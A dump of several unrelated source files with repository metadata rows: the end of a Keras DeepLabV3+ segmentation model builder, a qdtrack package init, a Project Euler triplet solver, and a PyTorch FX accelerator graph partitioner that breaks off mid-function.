    b0 = Conv2D(256, (1, 1), padding='same', use_bias=False, name='aspp0')(x)
    b0 = BatchNormalization(name='aspp0_BN', epsilon=1e-5)(b0)
    b0 = Activation('relu', name='aspp0_activation')(b0)
    # there are only 2 branches in mobilenetV2. not sure why
    if backbone == 'xception':
        # rate = 6 (12)
        b1 = SepConv_BN(x, 256, 'aspp1',
                        rate=atrous_rates[0], depth_activation=True, epsilon=1e-5)
        # rate = 12 (24)
        b2 = SepConv_BN(x, 256, 'aspp2',
                        rate=atrous_rates[1], depth_activation=True, epsilon=1e-5)
        # rate = 18 (36)
        b3 = SepConv_BN(x, 256, 'aspp3',
                        rate=atrous_rates[2], depth_activation=True, epsilon=1e-5)
        # concatenate ASPP branches & project
        x = Concatenate()([b4, b0, b1, b2, b3])
    else:
        x = Concatenate()([b4, b0])
    x = Conv2D(256, (1, 1), padding='same',
               use_bias=False, name='concat_projection')(x)
    x = BatchNormalization(name='concat_projection_BN', epsilon=1e-5)(x)
    x = Activation('relu')(x)
    x = Dropout(0.1)(x)
    # DeepLab v.3+ decoder
    if backbone == 'xception':
        # Feature projection
        # x4 (x2) block
        x = Lambda(lambda x: K.tf.image.resize_bilinear(x, size=(
            int(np.ceil(input_shape[0] / 4)), int(np.ceil(input_shape[1] / 4)))))(x)
        # project the low-level entry-flow features (skip1) down to 48 channels
        dec_skip1 = Conv2D(48, (1, 1), padding='same',
                           use_bias=False, name='feature_projection0')(skip1)
        dec_skip1 = BatchNormalization(
            name='feature_projection0_BN', epsilon=1e-5)(dec_skip1)
        dec_skip1 = Activation('relu')(dec_skip1)
        x = Concatenate()([x, dec_skip1])
        x = SepConv_BN(x, 256, 'decoder_conv0',
                       depth_activation=True, epsilon=1e-5)
        x = SepConv_BN(x, 256, 'decoder_conv1',
                       depth_activation=True, epsilon=1e-5)
    # you can use it with arbitary number of classes
    if nClasses == 21:
        last_layer_name = 'logits_semantic'
    else:
        last_layer_name = 'custom_logits_semantic'
    x = Conv2D(nClasses, (1, 1), padding='same', name=last_layer_name)(x)
    # upsample logits back to the full input resolution
    x = Lambda(lambda x: K.tf.image.resize_bilinear(x, size=(input_shape[0], input_shape[1])))(x)
    inputs = img_input
    # NOTE(review): two throwaway Model(...) instances are built only to read
    # the output spatial dimensions -- potentially expensive but harmless.
    outputHeight = Model(inputs,x).output_shape[1]
    outputWidth = Model(inputs, x).output_shape[2]
    # flatten spatial dims so a per-pixel softmax can be applied
    out = (Reshape((outputHeight * outputWidth, nClasses)))(x)
    out = Activation('softmax')(out)
    model = Model(input=inputs, output=out)
    model.outputHeight = outputHeight
    model.outputWidth = outputWidth
    #model.summary()
    return model
    #if infer:
    #    x = Activation('softmax')(x)
    #else:
    #    x = Reshape((input_shape[0] * input_shape[1], nClasses))(x)
    #    x = Activation('softmax')(x)
    # Ensure that the model takes into account
    # any potential predecessors of `input_tensor`.
    # if input_tensor is not None:
    #     inputs = get_source_inputs(input_tensor)
    #else:
    #    inputs = img_input
    # load weights
    '''
    if weights == 'pascal_voc':
        if backbone == 'xception':
            weights_path = get_file('deeplabv3_xception_tf_dim_ordering_tf_kernels.h5',
                                    WEIGHTS_PATH_X,
                                    cache_subdir='models')
        else:
            weights_path = get_file('deeplabv3_mobilenetv2_tf_dim_ordering_tf_kernels.h5',
                                    WEIGHTS_PATH_MOBILE,
                                    cache_subdir='models')
        model.load_weights(weights_path, by_name=True)
    '''
| [
"1602881391@qq.com"
] | 1602881391@qq.com |
a0ae8a8d5136d9398c96bd27dc8e2194c614cea3 | 19a2431f8473e063fcac3e2c787a4b2ef3903f20 | /qdtrack/models/roi_heads/track_heads/__init__.py | ce5fc1d664efc72a8e8f55c2cf18a98e1bb4984a | [
"Apache-2.0"
] | permissive | mageofboy/qdtrack | 9374ceae6bfa7d6444674e003ad56f4853419bf8 | 3458dffffb9a075852bf9d480f88a8e6f70ba9bf | refs/heads/master | 2023-07-22T17:33:44.516051 | 2021-07-17T03:55:12 | 2021-07-17T03:55:12 | 360,649,406 | 0 | 1 | Apache-2.0 | 2021-08-18T20:34:58 | 2021-04-22T18:46:06 | Python | UTF-8 | Python | false | false | 90 | py | from .quasi_dense_embed_head import QuasiDenseEmbedHead
__all__ = ['QuasiDenseEmbedHead'] | [
"pangjiangmiao@gmail.com"
] | pangjiangmiao@gmail.com |
e372ef2a62d72abec5ba965d40ac64c52e42e1cd | 6da9c8536378131cc28d6a9bbe2d1de7de70fbe8 | /Hackerrank/_Contests/Project_Euler/Python/pe009.py | 25a6197d9d0384d61e15f5053dfd1e8bf479f99c | [] | no_license | austinsonger/CodingChallenges | 50f61330270cb6452715e6c28ae93b4595df6aa3 | 0cdc23fb909aa06a24294d923cedd37621e56a81 | refs/heads/master | 2021-04-30T13:21:36.111770 | 2019-07-16T18:49:02 | 2019-07-16T18:49:02 | 121,293,018 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 596 | py | '''
Special Pythagorean triplet
Problem 9
A Pythagorean triplet is a set of three natural
numbers, a < b < c, for which, a^2 + b^2 = c^2
For example, 3^2 + 4^2 = 9 + 16 = 25 = 5^2.
There exists exactly one Pythagorean triplet
for which a + b + c = 1000.
Find the product abc.
'''
__author__ = 'SUN'
def find_triplet(total=1000):
    """Return the first Pythagorean triplet (a, b, c) with a < b < c and
    a + b + c == total, searching a (then b) in ascending order.

    Generalizes the original hard-coded total of 1000.  Returns None when no
    such triplet exists.
    """
    # a must be the smallest leg, so a < total / 3
    for a in range(1, total // 3):
        # b < c  <=>  b < (total - a) / 2
        for b in range(a + 1, (total - a) // 2 + 1):
            c = total - a - b
            if a * a + b * b == c * c:
                return a, b, c
    return None


if __name__ == '__main__':
    triplet = find_triplet()
    if triplet is not None:
        a, b, c = triplet
        # same output format as the original script
        print("a =", a, ", b =", b, ", c =", c, ', a * b * c = ', a * b * c)
| [
"austinvernsonger@protonmail.com"
] | austinvernsonger@protonmail.com |
591f5c567067bbf1a4785cce4f3aeadf302ac753 | 46279163a543cd8820bdc38133404d79e787c5d2 | /torch/fx/experimental/accelerator_partitioner.py | 43ec348d45e6d857feec35e24007b65c58eb1108 | [
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0",
"BSD-2-Clause"
] | permissive | erwincoumans/pytorch | 31738b65e7b998bfdc28d0e8afa7dadeeda81a08 | ae9f39eb580c4d92157236d64548b055f71cf14b | refs/heads/master | 2023-01-23T10:27:33.628897 | 2020-12-06T01:22:00 | 2020-12-06T01:23:40 | 318,930,000 | 5 | 1 | NOASSERTION | 2020-12-06T01:58:57 | 2020-12-06T01:58:56 | null | UTF-8 | Python | false | false | 41,390 | py | from torch.fx.graph_module import GraphModule
from torch.fx.node import Node, map_arg
from typing import Dict, List, Set, NamedTuple, Tuple
import torch
from torch.fx.experimental.subgraph_creation_example import split_module
import operator
from torch.fx.experimental.partitioner_utils import Partition, \
Device, PartitionerConfig, get_partition_to_latency_mapping,\
get_latency_of_partitioned_graph, NodeLatency, get_extra_size_of, \
PartitionMode
class DAGNode():
    """
    One node of the partition DAG: records a submodule call node together
    with its input/output nodes, the logical device ids it is mapped to,
    and its total size in bytes.
    """
    def __init__(
        self,
        submodule_node: Node,
        input_nodes: List[Node],
        output_nodes: List[Node],
        logical_device_ids: List[int],
        size_bytes: int
    ) -> None:
        # plain record of everything the partitioner needs later on
        self.submodule_node: Node = submodule_node
        self.input_nodes: List[Node] = input_nodes
        self.output_nodes: List[Node] = output_nodes
        self.logical_device_ids: List[int] = logical_device_ids
        self.size_bytes = size_bytes

    def __str__(self) -> str:
        # a DAG node prints as its underlying submodule node
        return f'{self.submodule_node}'
class DAG:
    """Ordered collection of DAGNodes describing the partitioned module."""
    def __init__(self) -> None:
        self.nodes: List[DAGNode] = []

    def create_node(
        self,
        submodule_node: Node,
        input_nodes: List[Node],
        output_nodes: List[Node],
        logical_devices: List[int],
        size_bytes: int
    ) -> None:
        """Wrap the arguments in a DAGNode and append it to ``self.nodes``."""
        dag_node = DAGNode(submodule_node, input_nodes, output_nodes, logical_devices, size_bytes)
        self.nodes.append(dag_node)
class PartitionResult(NamedTuple):
    """NamedTuple used for returning the DAG and a new graph module
    """
    # DAG describing the generated partitions (one DAGNode per submodule)
    dag: DAG
    # the original module rewritten with one submodule per partition
    module_with_submodules: GraphModule
"""Followings are some helper functions for partition manipulation"""
def reset_partition_device(partitions):
    """Clear the logical device assignment of every partition in the list."""
    for part in partitions:
        part.logical_device_ids = []
def combine_two_partitions(
    partition_0: Partition,
    partition_1: Partition,
    partitions: List[Partition]
) -> None:
    """Merge ``partition_0`` and ``partition_1`` into one fresh partition.

    The merged partition (holding the union of both node sets, with its
    memory size recomputed) is appended to ``partitions``, the two originals
    are removed, and partition ids plus parent/child links are rebuilt.
    """
    merged = Partition(len(partitions))
    merged.nodes = partition_0.nodes.union(partition_1.nodes)
    merged.recalculate_mem_size()
    partitions.append(merged)
    for stale in (partition_0, partition_1):
        partitions.remove(stale)
    # ids and parent/child links are stale after the mutation -- rebuild them
    reorganize_partitions(partitions)
    return
def set_parents_and_children(partitions: List[Partition]) -> None:
    """Recompute the parent/child links between partitions.

    Partition P is a parent of Q when some node owned by P (and not also
    owned by Q) has a user that lives in Q.
    """
    # start from a clean slate on every partition
    for part in partitions:
        part.children = set()
        part.parents = set()
    for producer in partitions:
        for node in producer.nodes:
            # every user of this node may pull another partition in as a child
            for user in node.users:
                for consumer in partitions:
                    # skip the producing partition itself, and the case where
                    # the producing node also lives inside the candidate
                    if consumer != producer and user in consumer.nodes and node not in consumer.nodes:
                        producer.children.add(consumer)
                        consumer.parents.add(producer)
    return
def reorganize_partitions(partitions: List[Partition]) -> None:
    """Renumber partitions to match their list position and refresh
    every partition's parent/child links.
    """
    for new_id, part in enumerate(partitions):
        part.partition_id = new_id
    # Relationships may reference removed/merged partitions; rebuild them.
    set_parents_and_children(partitions)
    return
def get_bfs_level_partition(partitions: List[Partition]) -> None:
    """Assign a breadth-first level (`bfs_level`) to each reachable partition.

    Root partitions (those with no parents) get level 0.  A partition
    reachable through several paths is re-visited at every level it appears
    in, so it ends up with its *deepest* level (longest-path semantics),
    exactly as the frontier-swap traversal implies.
    """
    # Seed the frontier with all root partitions.
    frontier = set()
    for part in partitions:
        if len(part.parents) == 0:
            frontier.add(part)
    depth = 0
    # Expand one whole level at a time.
    while frontier:
        upcoming = set()
        for part in frontier:
            part.bfs_level = depth
            upcoming.update(part.children)
        frontier = upcoming
        depth += 1
    return
def get_node_to_partition_mapping(partitions: List[Partition]) -> Dict[Node, int]:
    """Build a mapping from every graph node to the id of the partition
    that owns it.
    """
    return {
        node: partition.partition_id
        for partition in partitions
        for node in partition.nodes
    }
def get_device_to_partitions_mapping(partitions: List[Partition], devices: List[Device]):
    """Given a list of partitions and a list of devices,
    map each partition onto a logical device.

    Partitions that already carry a logical device id keep it; the
    remaining partitions are placed greedily onto the device with the
    least (but sufficient) free memory.  Returns True when every
    partition found a device, False otherwise.
    """
    def calculate_extra_mem_bytes_needed_for(partition: Partition, partitions: List[Partition]):
        """Extra bytes `partition` needs on a device already holding
        `partitions` (shared inputs are only counted once)."""
        all_nodes: Set[Node] = set()
        for p in partitions:
            all_nodes = all_nodes.union(p.nodes)
        if len(all_nodes) == 0:
            return partition.used_mem_bytes
        all_nodes = all_nodes.union(partition.nodes)
        extra_size_needed = 0
        for node in partition.nodes:
            extra_size_needed += get_extra_size_of(node, all_nodes)
        return extra_size_needed

    def find_device_for(partition: Partition):
        """Given a partition, find a logical device for the partition
        The algorithm is that:
        #1. sort all the devices based on left mem size
        #2. put the partition on the device that has just enough mem
        for that partition
        """
        for d in device_to_left_mem_bytes:
            extra_size_needed = calculate_extra_mem_bytes_needed_for(partition, device_to_partitions[d])
            if extra_size_needed < device_to_left_mem_bytes[d]:
                device_to_partitions[d].append(partition)
                partition.logical_device_ids.append(d.logical_id)
                device_to_left_mem_bytes[d] -= extra_size_needed
                return True
        return False

    # logical id to device
    logical_id_to_device: Dict[int, Device] = {}
    # Track partitions on device
    device_to_partitions: Dict[Device, List[Partition]] = {}
    # Track device's left mem size
    device_to_left_mem_bytes: Dict[Device, int] = {}
    for d in devices:
        logical_id_to_device[d.logical_id] = d
        device_to_partitions[d] = []
        device_to_left_mem_bytes[d] = d.available_mem_bytes
    # Deal with the partitions that already have a device,
    # and collect all no-device partitions.
    no_device_partitions = []
    for partition in partitions:
        if partition.logical_device_ids != []:
            logical_id = partition.logical_device_ids[0]
            device = logical_id_to_device[logical_id]
            # BUGFIX: append to (not overwrite) the device's partition list,
            # so several pre-assigned partitions on one device all count,
            # and subtract from *this* device's budget -- the previous code
            # used the stale loop variable `d` (always the last device) and
            # reset the budget instead of decrementing it.
            device_to_partitions[device].append(partition)
            device_to_left_mem_bytes[device] -= partition.used_mem_bytes
        else:
            no_device_partitions.append(partition)
    # Find device for each no device partition
    found_device = True
    for partition in no_device_partitions:
        # Re-sort devices by remaining memory (ascending) before each placement.
        device_to_left_mem_bytes = {
            d: left_mem_bytes for d, left_mem_bytes
            in sorted(device_to_left_mem_bytes.items(), key=lambda item: item[1])
        }
        found_device = find_device_for(partition)
        if not found_device:
            break
    return found_device
def check_dependency(partition):
    """Return True when `partition` participates in a cycle, i.e. it can
    be reached again by transitively following its children.
    """
    seen = {partition}
    pending = [partition]
    while pending:
        current = pending.pop()
        for successor in current.children:
            if successor == partition:
                # Walked back to the start: circular dependency.
                return True
            if successor not in seen:
                seen.add(successor)
                pending.append(successor)
    return False
class Partitioner:
    """A graph module may not fit into one device.
    Partitioner class helps cut one graph into subgraphs (partitions),
    so that each partition could fit into a different device.
    The main function of this class is self.partition_graph.
    It will partition the graph based on the scheme specified in partition_config
    A DAG structure is returned
    along with a new graph module with partitions as submodule nodes.
    """
    def __init__(self) -> None:
        # Partitions found so far; index in this list tracks partition_id.
        self.partitions: List[Partition] = []
        # Maps each graph node to the id of the partition owning it.
        self.node_to_partition: Dict[Node, int] = {}
        # Logical devices the partitions are placed onto.
        self.devices: List[Device] = []
    def partition_graph(
        self,
        fx_module: GraphModule,
        torch_module: torch.nn.Module,
        partitioner_config: PartitionerConfig
    ) -> PartitionResult:
        """
        Given the fx module, torch module and partitioner_config,
        find the partitions, do the partitions,
        and then return a DAG and a new fx module with submodule nodes (partitions)
        """
        self.graph_module = fx_module
        self.torch_module = torch_module
        self.devices = partitioner_config.devices
        if len(self.devices) == 0:
            raise RuntimeError('No devices')
        # Check if there are op nodes in the graph
        nodes = self.graph_module.graph.nodes
        if all(node.op in {'placeholder', 'get_attr', 'output'} for node in nodes):
            raise RuntimeError('No Partition since no operations in the module')
        # Calculate total size of the graph
        total_size_of_graph = 0
        for node in nodes:
            if node.op == 'output':
                break
            total_size_of_graph += node.size_bytes.total_size
        device_with_max_mem = max(self.devices, key=lambda d: d.available_mem_bytes)
        # Dispatch on the partitioning mode; a graph that fits on the
        # largest single device short-circuits to one partition.
        if partitioner_config.mode == PartitionMode.aot_based:
            self.aot_based_partition(
                partitioner_config.node_to_partition_mapping,
                partitioner_config.partition_to_logical_device_mapping
            )
        elif total_size_of_graph <= device_with_max_mem.available_mem_bytes:
            self.find_single_partition(total_size_of_graph)
        elif total_size_of_graph > sum([d.available_mem_bytes for d in self.devices]):
            raise RuntimeError('Devices have no enough memory for the module')
        else:
            if partitioner_config.mode == PartitionMode.sparse_nn:
                available_mem_bytes = self.devices[0].available_mem_bytes
                if not all(device.available_mem_bytes == available_mem_bytes for device in self.devices):
                    raise RuntimeError('All devices must have same memory size!')
                # sparse_nn_partition only support same memory size
                # TODO: add different size support for sparse_nn_partition
                self.sparse_nn_partition(available_mem_bytes)
            elif partitioner_config.mode == PartitionMode.cost_aware:
                self.cost_aware_partition(
                    partitioner_config.transfer_rate_bytes_per_sec,
                    partitioner_config.node_to_latency_mapping
                )
            elif partitioner_config.mode == PartitionMode.kl_based:
                self.kl_based_partition(
                    partitioner_config.transfer_rate_bytes_per_sec,
                    partitioner_config.node_to_latency_mapping
                )
            else:
                self.size_based_partition()
        module_with_submodules = self.do_partition()
        # The DAG contains DAGNodes with info of each partition's input nodes, output nodes
        # and how partitions are connected.
        dag = self.dump_dag(module_with_submodules)
        ret = PartitionResult(dag, module_with_submodules)
        return ret
    def find_single_partition(self, total_size_of_graph) -> None:
        """Only one partition (one graph on one device)."""
        partition_0 = self.create_partition()
        for node in self.graph_module.graph.nodes:
            if node.op == 'output':
                break
            partition_0.nodes.add(node)
        partition_0.used_mem_bytes = total_size_of_graph
        # The whole graph lives on logical device 0.
        partition_0.logical_device_ids = [0]
        # Get the node to partition mapping
        self.node_to_partition = get_node_to_partition_mapping(self.partitions)
        return
    def size_based_partition(self) -> None:
        """This method is to partition the graph based on memory size.
        It uses greedy approach. The result may not be the best.
        The basic idea is:
        Step 1:
        Find a device which has enough memory to fit the first node, create a empty partition
        with the size of that device.
        Then keep adding the following nodes into the partition until the partition is full.
        Step 2:
        Repeat Step 1 until no device left
        Step 3:
        If some nodes are left, create a partition for each left node (single node partition).
        and then try to map those partitions into logical devices with non single node partitions.
        """
        def find_device_based_on_size(node) -> Device:
            """Given a node, this function is to find a logical device
            that could fit the node.
            """
            mem_size_needed = get_extra_size_of(node, set())
            # Sentinel device with available_mem_bytes == -1 means "not found".
            device = Device('', -1, -1)
            for d in self.devices:
                if d not in occupied_devices and d.available_mem_bytes >= mem_size_needed:
                    device = d
                    break
            if device.available_mem_bytes < 0:
                raise RuntimeError(str(node) + 'is too large to fit any device')
            occupied_devices.append(device)
            return device
        # Track partition and its left mem size
        partition_to_left_mem_bytes: Dict[Partition, int] = {}
        # Track all the devices that have been used
        occupied_devices: List[Device] = []
        partition = self.create_partition()
        for node in self.graph_module.graph.nodes:
            if node.op in {'call_module', 'call_method', 'call_function'}:
                # Check if there are devices left
                if len(self.partitions) <= len(self.devices):
                    total_size_of_input_nodes = get_extra_size_of(node, partition.nodes)
                    # Check if the current partition is the very first partition
                    if partition.used_mem_bytes == 0:
                        # Find a device to fit the first node, return available mem size
                        device = find_device_based_on_size(node)
                        occupied_devices.append(device)
                        # Update partition and its left mem size
                        partition_to_left_mem_bytes[partition] = device.available_mem_bytes
                        # Update available mem for the current partition
                        partition.logical_device_ids.append(device.logical_id)
                    else:
                        # The current partition is not the first partition
                        # Check if the current node can fit into this partition
                        if partition_to_left_mem_bytes[partition] < total_size_of_input_nodes:
                            # Check if no device is left
                            if len(self.partitions) == len(self.devices):
                                # No device left, all the partitions before are non single node partitions
                                # NOTE(review): this local is never read afterwards -- looks like
                                # leftover bookkeeping; confirm before removing.
                                non_single_node_partitions = self.partitions[:]
                                # Create the first single node partition for the current node
                                self.create_single_node_partition(node)
                                continue
                            # Some devices are still left
                            device = find_device_based_on_size(node)
                            partition = self.create_partition()
                            total_size_of_input_nodes = get_extra_size_of(node, partition.nodes)
                            partition_to_left_mem_bytes[partition] = device.available_mem_bytes
                            partition.logical_device_ids.append(device.logical_id)
                    partition.add_node(node)
                    partition_to_left_mem_bytes[partition] -= total_size_of_input_nodes
                # No device left, create single node partitions
                else:
                    self.create_single_node_partition(node)
        reorganize_partitions(self.partitions)
        # Get the node to partition mapping
        self.node_to_partition = get_node_to_partition_mapping(self.partitions)
        # Mapping all partitions into device
        found_partition_to_device_mapping = get_device_to_partitions_mapping(self.partitions, self.devices)
        if not found_partition_to_device_mapping:
            raise RuntimeError("Cannot Get a Valid Partition to Logical Device Mapping")
        return
    def do_partition(self) -> GraphModule:
        """Return a module with submodules (partitions)."""
        module_with_submodules = split_module(
            self.graph_module,
            self.torch_module,
            lambda node: self.node_to_partition[node]
        )
        return module_with_submodules
    def dump_dag(self, module_with_submodules: GraphModule) -> DAG:
        """Build the DAG of partitions from the split module produced by
        do_partition(): one DAGNode per submodule call."""
        dag = DAG()
        for node in module_with_submodules.graph.nodes:
            if node.op == 'output':
                break
            if node.op in {'placeholder', 'get_attr'}:
                continue
            # 'getitem' nodes only unpack multi-output results; skip them.
            if node.target == operator.__getitem__:
                continue
            input_nodes : Dict[Node, None] = {}
            map_arg(node.args, lambda n: input_nodes.setdefault(n))
            map_arg(node.kwargs, lambda n: input_nodes.setdefault(n))
            # When a node has two or more output nodes,
            # it outputs its result to 'getitem' nodes.
            # Those 'getitem' nodes are the output node for this node.
            # Otherwise, the output node is this node itself.
            if len(node.users) > 1:
                output_nodes = list(node.users)
            else:
                output_nodes = [node]
            # Submodule names end in "_<partition_id>" (split_module convention);
            # recover the id from the node name.
            partition_id = int(node.name.rsplit('_', 1)[-1])
            device_ids = self.partitions[partition_id].logical_device_ids
            size_bytes = self.partitions[partition_id].used_mem_bytes
            dag.create_node(node, list(input_nodes), output_nodes, device_ids, size_bytes)
        return dag
    def create_partition(self) -> Partition:
        """Create a partition and append it to self.partitions."""
        partition_id = len(self.partitions)
        partition = Partition(partition_id)
        self.partitions.append(partition)
        return partition
    def create_single_node_partition(self, node):
        """Create a partition for a single node
        """
        partition = self.create_partition()
        partition.add_node(node)
        return
    def sparse_nn_partition(self, available_mem_bytes: int) -> None:
        """This method partition a sparse nn module.
        It first traverse all the nodes and do the partitions based on memory size.
        If the current partition has no enough memory left for a new op node
        (call_module, call_method, call_function), a new partition is created.
        Different from size_based_partition, when traversing cross the boundary between
        non-embedding nodes and embedding nodes, a new partition is created regardlessly.
        For example, if the current node is a non-embedding node but the next node is an
        embedding node, a new partition is created for the next node.
        After the partition, the partitions are combined as much as possible.
        The rule is that a non-embedding partition only
        combines with another non-embedding one.
        So as the embedding partitions.
        """
        def combine_partitions_based_on_size(partitions: List[Partition], available_mem_bytes: int) -> None:
            """Combining small partitions together to keep as less partitions as possible.
            Here is an example of the algorithm to do this:
            Assume some partitions, we first sort them based on partition used memory size.
            [(partition_4, 1), (partition_3, 1), (partition_2, 2), (partition_1, 7), (partition_0, 9)]
            The available memory is 10.
            step 1: self.find_partition_to_combine_based_on_size()
            First, mark bfs level for each partition
            Second, look the smallest partition, partition_4: 10 - 1 = 9
            It means any partition has a used memory equal or less than 9 could combine this partition
            We go from the largest and selection partition_0.
            Check the bfs level for two partitions, if the level difference is less than 2,
            it can be combined.
            Then repeat step 1.
            """
            find_combination = True
            while find_combination:
                # Sort partitions based on memory size
                sorted_partitions = sorted(partitions, key=lambda p: p.used_mem_bytes)
                # Mark bfs level
                get_bfs_level_partition(self.partitions)
                find_combination, partitions = \
                    find_partition_to_combine_based_on_size(
                        sorted_partitions,
                        available_mem_bytes,
                        partitions
                    )
            return
        def calculate_mem_bytes_needed(p1, p2):
            """Given two partitions, calculate how many mem bytes
            are needed if two partitions are combined
            """
            nodes = p1.nodes.union(p2.nodes)
            mem_bytes_needed = 0
            for node in nodes:
                mem_bytes_needed += get_extra_size_of(node, nodes)
            return mem_bytes_needed
        def find_partition_to_combine_based_on_size(
            sorted_partitions: List[Partition],
            available_mem_bytes: int,
            partitions: List[Partition]
        ) -> Tuple[bool, List[Partition]]:
            """step 1 in combine_partition_based_on_size()"""
            find_combination = False
            smallest_partition = sorted_partitions.pop(0)
            # Scan candidates from largest to smallest.
            for p in sorted_partitions[::-1]:
                if abs(smallest_partition.bfs_level - p.bfs_level) <= 1:
                    # Calculate how many bytes needed if combined
                    mem_bytes_needed = calculate_mem_bytes_needed(p, smallest_partition)
                    if mem_bytes_needed <= available_mem_bytes:
                        combine_two_partitions(p, smallest_partition, self.partitions)
                        partitions.remove(smallest_partition)
                        partitions.remove(p)
                        partitions.append(self.partitions[-1])
                        find_combination = True
                        break
            return find_combination, partitions
        def reset_partition_in_sparse_nn(partition, new_partition=True):
            # File the finished partition under the correct category, and
            # optionally start a fresh one with a full memory budget.
            if in_embedding_region:
                embedding_partitions.append(partition)
            else:
                non_embedding_partitions.append(partition)
            if new_partition:
                partition = self.create_partition()
                partition.left_mem_bytes = available_mem_bytes
                return partition
            return None
        def is_embedding_node(node: Node) -> bool:
            """Check if a node is an embedding node"""
            if node.op == 'call_module':
                submodule = self.graph_module
                for atom in str(node.target).split('.'):
                    if not hasattr(submodule, atom):
                        raise RuntimeError(f'Module {submodule} has no attribute {atom}')
                    submodule = getattr(submodule, atom)
                    # Heuristic: the submodule's repr mentions 'Embedding'.
                    if 'Embedding' in str(submodule):
                        return True
            return False
        # Track embedding partitions and non-embedding partitions separately
        embedding_partitions: List[Partition] = []
        non_embedding_partitions: List[Partition] = []
        # A Flag to check the boundary
        in_embedding_region: bool = False
        partition = self.create_partition()
        for node in self.graph_module.graph.nodes:
            if node.op in {'call_module', 'call_method', 'call_function'}:
                # Check if crossing the boundary between embedding nodes and non embedding nodes
                if is_embedding_node(node) != in_embedding_region:
                    # Crossing the boundary
                    # Check if the current partition is an empty partition
                    if partition.used_mem_bytes != 0:
                        # The current partition isn't an empty partition. Create a new one.
                        partition = reset_partition_in_sparse_nn(partition)
                    in_embedding_region = not in_embedding_region
                total_size_of_input_nodes = get_extra_size_of(node, partition.nodes)
                if total_size_of_input_nodes + partition.used_mem_bytes > available_mem_bytes:
                    partition = reset_partition_in_sparse_nn(partition)
                    total_size_of_input_nodes = get_extra_size_of(node, partition.nodes)
                    if total_size_of_input_nodes > available_mem_bytes:
                        # NOTE(review): node.target may be a callable (call_function),
                        # in which case this concatenation raises TypeError -- confirm.
                        raise RuntimeError(node.target + 'is too large to fit into a device')
                partition.add_node(node)
        reset_partition_in_sparse_nn(partition, new_partition=False)
        # Set parents and children for partitions
        set_parents_and_children(self.partitions)
        # Combining non-embedding partitions
        combine_partitions_based_on_size(non_embedding_partitions, available_mem_bytes)
        # Combining embedding partitions
        combine_partitions_based_on_size(embedding_partitions, available_mem_bytes)
        total_size_of_non_embedding_partitions = 0
        for partition in non_embedding_partitions:
            total_size_of_non_embedding_partitions += partition.used_mem_bytes
        # Check if devices are enough for all partitions
        if len(embedding_partitions) > len(self.devices):
            msg = 'Need ' + str(len(embedding_partitions)) + ' devices, but only ' \
                + str(len(self.devices)) + ' provided'
            raise RuntimeError(msg)
        occupied_devices = []
        for i, partition in enumerate(embedding_partitions):
            # Check if all non-embedding partitions can fit into embedding partition devices
            if total_size_of_non_embedding_partitions + partition.used_mem_bytes > available_mem_bytes:
                raise RuntimeError(
                    'partition_' +
                    str(partition.partition_id) +
                    '(embedding partition) and non embedding partitions can not fit into one device'
                )
            else:
                # Add logical device to the partition
                partition.logical_device_ids = [self.devices[i].logical_id]
                occupied_devices.append(self.devices[i].logical_id)
        # Add logical devices to the non_embedding_partitions
        for partition in non_embedding_partitions:
            partition.logical_device_ids = occupied_devices
        # Get the node to partition mapping
        self.node_to_partition = get_node_to_partition_mapping(self.partitions)
        return
    def cost_aware_partition(
        self,
        transfer_rate_bytes_per_sec: float,
        node_to_latency_mapping: Dict[Node, NodeLatency]
    ) -> None:
        """This method is to partition the fx module based on the cost.
        The cost is the total latency of running the whole graph.
        In partitioner_utils.py, the cost model is built.
        The algorithm is:
        #1. At every beginning, each node is a partition.
        Then we map all the partitions to the devices
        and calculate the cost
        #2. Then try to pre-combine any two of the partitions if the two
        partitions can be combined.
        (the bfs level is less than 2 or two partitions are connected and
        can find partition to device mapping)
        See if any partition pair could reduce the current cost.
        Choose the pair that shows the minimum cost and then combine them
        #3. Repeat #2 until the cost cannot be reduced.
        """
        def try_combining_partitions(
            p0_index,
            p1_index,
            partitions
        ) -> float:
            """Given two partitions and a list of partitions, try to combine these two partitions
            and see what is the cost of the modified partition list
            """
            p0 = partitions[p0_index]
            p1 = partitions[p1_index]
            """If two partitions' bfs level are less than 2 or two partitions are connected to each other,
               then they can be combined
            """
            if (abs(p0.bfs_level - p1.bfs_level) <= 1) or (p0 in p1.parents) or p0 in (p1.children):
                combine_two_partitions(p0, p1, partitions)
                # Check if a circular dependency exists after combining
                if check_dependency(partitions[-1]):
                    return float('inf')
                # Check if the modified partition list can be mapped to devices after combination
                reset_partition_device(partitions)
                found_deivce = get_device_to_partitions_mapping(partitions, self.devices)
                if not found_deivce:
                    return float('inf')
                # Calculate the new cost
                partition_to_latency_mapping = get_partition_to_latency_mapping(partitions, node_to_latency_mapping)
                cost = get_latency_of_partitioned_graph(partitions, partition_to_latency_mapping, transfer_rate_bytes_per_sec)
                return cost
            # If two partition can not be combined, the cost is inf
            return float('inf')
        def search_combination(
            transfer_rate_bytes_per_sec,
            node_to_latency_mapping
        ) -> bool:
            """Given transfer rate between partitions and each node's latency,
            find two partitions to combine so the cost of the partitions can
            be reduced.
            The algorithm is :
            1. Going through all the partition pairs and see
            if the pair of partitions can be combined.
            2. If they are combined, the cost is calculated.
            3. Select the minimum cost and combine its corresponding partition pair
            """
            partition_to_latency_mapping = get_partition_to_latency_mapping(self.partitions, node_to_latency_mapping)
            cost = get_latency_of_partitioned_graph(self.partitions, partition_to_latency_mapping, transfer_rate_bytes_per_sec)
            if len(self.partitions) == 1:
                return False
            partition_pair: List[int] = []
            for i in range(len(self.partitions) - 1):
                for j in range(i + 1, len(self.partitions)):
                    # Try to combine the partition pair
                    # and see the new cost after combination.
                    # A copy of the list is passed so self.partitions stays intact.
                    new_cost = try_combining_partitions(
                        i,
                        j,
                        self.partitions[:]
                    )
                    if new_cost <= cost:
                        partition_pair = [i, j]
                        cost = new_cost
                    reorganize_partitions(self.partitions)
            # If a partition pair is found, combine them
            if len(partition_pair) != 0:
                p0 = self.partitions[partition_pair[0]]
                p1 = self.partitions[partition_pair[1]]
                combine_two_partitions(p0, p1, self.partitions)
            get_bfs_level_partition(self.partitions)
            reset_partition_device(self.partitions)
            get_device_to_partitions_mapping(self.partitions, self.devices)
            return len(partition_pair) != 0
        # Start with one single-node partition per op node.
        for node in self.graph_module.graph.nodes:
            if node.op not in {'placeholder', 'get_attr', 'output'}:
                self.create_single_node_partition(node)
